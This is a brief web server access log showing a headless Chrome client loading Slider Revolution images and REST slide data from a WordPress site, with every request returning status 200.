104.197.69.115 - - [23/Sep/2025:23:42:35 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [23/Sep/2025:23:42:36 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [23/Sep/2025:23:42:36 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [23/Sep/2025:23:42:36 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [23/Sep/2025:23:42:37 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [23/Sep/2025:23:42:38 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [23/Sep/2025:23:42:39 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
